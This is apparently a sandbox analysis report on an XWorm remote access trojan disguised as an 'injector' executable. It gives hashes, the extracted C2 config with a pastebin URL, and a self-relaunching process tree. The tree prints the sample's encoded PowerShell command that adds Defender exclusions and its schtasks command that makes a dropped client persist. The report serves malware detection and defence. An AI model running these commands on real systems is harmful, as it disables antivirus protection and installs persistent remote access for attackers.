Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    2s
  • max time network
    41s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/03/2025, 16:36

General

  • Target

    AlisInjector(x64).exe

  • Size

    540KB

  • MD5

    5d577543e14898862de2fc5f4976af91

  • SHA1

    38569f433469a7b9d04acc52158523ce7b3e6cf3

  • SHA256

    61493f2dac1330b7b853c4af5298dbcfbdef56f4cbd44c2266e0d23ba9d44483

  • SHA512

    223a01dc8c67da3889140a6e77a3a4721c35ba4254c165675053627dc5a558b790fdda286a545b92424a5690b6e0e3df8eacca21da67dea44a490170adacc165

  • SSDEEP

    12288:IepEAmsrIPR7Ifas9YFu7QHzs1vnVRLhjg0BX:I2S4taanVHB

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

cR9KWMfVyMWGAarG

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/fSgk0zpE

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2300
    • C:\Users\Admin\AppData\Local\Temp\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1152
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4212
    • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
      "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Users\Admin\AppData\Local\Temp\msedge.exe
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4648
      • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
        "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5100
        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
        • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
          "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:776
          • C:\Users\Admin\AppData\Local\Temp\msedge.exe
            "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3316
          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2904
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:728
            • C:\Users\Admin\AppData\Local\Temp\msedge.exe
              "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1420
            • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
              "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:1948
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                7⤵
                  PID:2468
                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                  7⤵
                    PID:3208
                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                    7⤵
                      PID:2244
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                        8⤵
                          PID:1556
                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                          8⤵
                            PID:4432
                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                            8⤵
                              PID:60
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                9⤵
                                  PID:4364
                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                  9⤵
                                    PID:5064
                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                    9⤵
                                      PID:3040
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                        10⤵
                                          PID:3432
                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                          10⤵
                                            PID:936
                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                            10⤵
                                              PID:5084
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                11⤵
                                                  PID:5048
                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                  11⤵
                                                    PID:1404
                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                    11⤵
                                                      PID:4232
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                        12⤵
                                                          PID:468
                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                          12⤵
                                                            PID:2936
                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                            12⤵
                                                              PID:1824
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                13⤵
                                                                  PID:3040
                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                  13⤵
                                                                    PID:3408
                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                    13⤵
                                                                      PID:3808
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                        14⤵
                                                                          PID:4704
                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                          14⤵
                                                                            PID:2840
                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                            14⤵
                                                                              PID:4552
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                15⤵
                                                                                  PID:3972
                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                  15⤵
                                                                                    PID:384
                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                    15⤵
                                                                                      PID:4324
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                        16⤵
                                                                                          PID:1128
                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                          16⤵
                                                                                            PID:2712
                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                            16⤵
                                                                                              PID:4436
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                17⤵
                                                                                                  PID:3824
                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                  17⤵
                                                                                                    PID:1824
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                    17⤵
                                                                                                      PID:4780
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                        18⤵
                                                                                                          PID:5220
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                          18⤵
                                                                                                            PID:5252
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                            18⤵
                                                                                                              PID:5344
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                19⤵
                                                                                                                  PID:5584
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                  19⤵
                                                                                                                    PID:5632
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                    19⤵
                                                                                                                      PID:5652
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                        20⤵
                                                                                                                          PID:5920
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                          20⤵
                                                                                                                            PID:5932
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                            20⤵
                                                                                                                              PID:5948
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                21⤵
                                                                                                                                  PID:5236
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                  21⤵
                                                                                                                                    PID:5060
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                    21⤵
                                                                                                                                      PID:4500
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                        22⤵
                                                                                                                                          PID:5360
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                          22⤵
                                                                                                                                            PID:2752
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                            22⤵
                                                                                                                                              PID:5744
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                23⤵
                                                                                                                                                  PID:6128
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                  23⤵
                                                                                                                                                    PID:936
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                    23⤵
                                                                                                                                                      PID:6016
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                        24⤵
                                                                                                                                                          PID:4524
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                          24⤵
                                                                                                                                                            PID:5828
